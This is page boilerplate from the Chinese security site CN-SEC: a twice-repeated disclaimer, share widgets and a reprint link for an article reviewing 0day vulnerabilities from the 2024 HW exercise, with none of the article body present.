免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月24日21:16:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   护网行动2024漏洞复盘:这些0day漏洞为何让企业一夜崩盘?https://cn-sec.com/archives/3993111.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息